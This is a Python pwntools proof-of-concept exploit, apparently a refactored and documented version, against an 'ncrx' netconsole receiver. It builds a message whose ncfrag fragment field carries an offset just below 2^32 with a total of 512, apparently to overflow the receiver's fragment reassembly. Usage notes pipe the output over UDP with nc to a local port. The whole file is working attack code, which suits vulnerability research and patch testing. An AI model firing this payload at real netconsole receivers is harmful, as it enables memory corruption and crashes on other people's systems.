#!/usr/bin/env python3

import argparse
from pwn import *


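class Exploit:
    """Build netconsole-style messages for the ``ncrx`` receiver PoC.

    The only instance state is ``num_messages``, a count of how many
    messages ``craft_message`` has produced so far.
    """

    def __init__(self):
        self.num_messages = 0

    def conn(self, port):
        """Open a pwntools ``remote`` connection to ``localhost:<port>``."""
        return remote('localhost', port)

    def craft_message(self, meta_dict=None):
        """Return one complete message: header followed by a 512-byte body.

        ``meta_dict`` holds the KEY=VAL pairs appended after the text; it
        defaults to ``{'UNAME': 'ubuntu'}``. A ``None`` sentinel replaces the
        original mutable default so no dict is shared between calls.
        Increments ``num_messages`` as a side effect.
        """
        if meta_dict is None:
            meta_dict = {'UNAME': 'ubuntu'}
        header = self.craft_msg_header()
        body = self.craft_msg_body('a' * 512, meta_dict)
        self.num_messages += 1
        return header + body

    def craft_msg_header(self, seqnum=0):
        """Return the message header, terminated by ``;``.

        Layout: ``<level>,<seqnum>,<timestamp>,<contflag>[,KEY=VAL]*;``
        (the original comment: ``/* [release,]<level>,<sequnum>,<timestamp>,
        <contflag>[,KEY=VAL]* */``).

        ``seqnum`` is now emitted in the second field; the original shadowed
        it with a local ``sequnum = 0`` and ignored the parameter. The
        facility/level byte is fixed at facility 0, level 3; the timestamp is
        ``time.monotonic()`` in microseconds; the continuation flag is
        always ``-``. The trailing ``ncfrag=<offset>/<total>`` field carries
        offset ``(1 << 32) - 0xff`` and total ``512`` exactly as in the
        original PoC — a receiver must bounds-check this pair before using
        it for fragment reassembly.
        """
        facility, level = 0, 3
        faclev = facility << 3 | level
        ts_usec = int(time.monotonic() * (10 ** 6))
        ncfrag = 'ncfrag={}/{}'.format((1 << 32) - 0xff, 1 << 9)
        return '{},{},{},{},{};'.format(faclev, seqnum, ts_usec, '-', ncfrag)

    def craft_msg_body(self, text, meta_dict):
        """Return ``text`` followed by one ``KEY=VAL`` line per dict entry.

        NUL bytes, both in ``text`` and inside the joined KEY=VAL pairs, are
        rewritten to ``\\n`` so the body stays a newline-delimited record.
        Joining on ``\\n`` and then replacing ``\\0`` gives the same result as
        the original join-on-NUL-then-replace.
        """
        text = text.replace('\0', '\n')
        pairs = ('{}={}'.format(k, v) for k, v in meta_dict.items())
        dict_string = '\n'.join(pairs).replace('\0', '\n')
        return '{}\n{}'.format(text, dict_string)

    def payload_gen(self):
        """Return a single crafted message using the default metadata.

        Usage:
            on the other shell: ./ncrx 31337
            on this shell: ./exploit | nc -u 127.0.0.1 31337
        """
        return self.craft_message()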



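def main():
    """Command-line entry point.

    ``--generate``/``-g`` prints one crafted message to stdout (intended to
    be piped into ``nc -u``, see ``Exploit.payload_gen``). ``--remote`` is
    accepted but not implemented and only prints a notice. The two flags are
    mutually exclusive and one is required, so after ``--remote`` is handled
    only ``--generate`` remains; the original trailing ``elif args.remote``
    branch could never run and has been dropped, as has the one-iteration
    ``for`` loop around the print.
    """
    parser = argparse.ArgumentParser()
    mode = parser.add_mutually_exclusive_group(required=True)
    mode.add_argument('--generate', '-g', action='store_true',
                      help='print one crafted message to stdout')
    mode.add_argument('--remote', action='store_true',
                      help='not supported')
    args = parser.parse_args()

    if args.remote:
        # quit() comes from the site module and may be absent; returning
        # from main() ends the script with the same zero exit status.
        print('remote mode not supported')
        return

    exp = Exploit()
    print(exp.payload_gen(), flush=True)
    # Kept from the original: presumably holds stdout open long enough for a
    # downstream `nc -u` to pick up the datagram — TODO confirm.
    time.sleep(1)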


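# Script entry guard. The original also carried a commented-out
# `exp.exploit()` call; no `exploit` method exists on Exploit, so the
# dead line was removed.
if __name__ == '__main__':
    main()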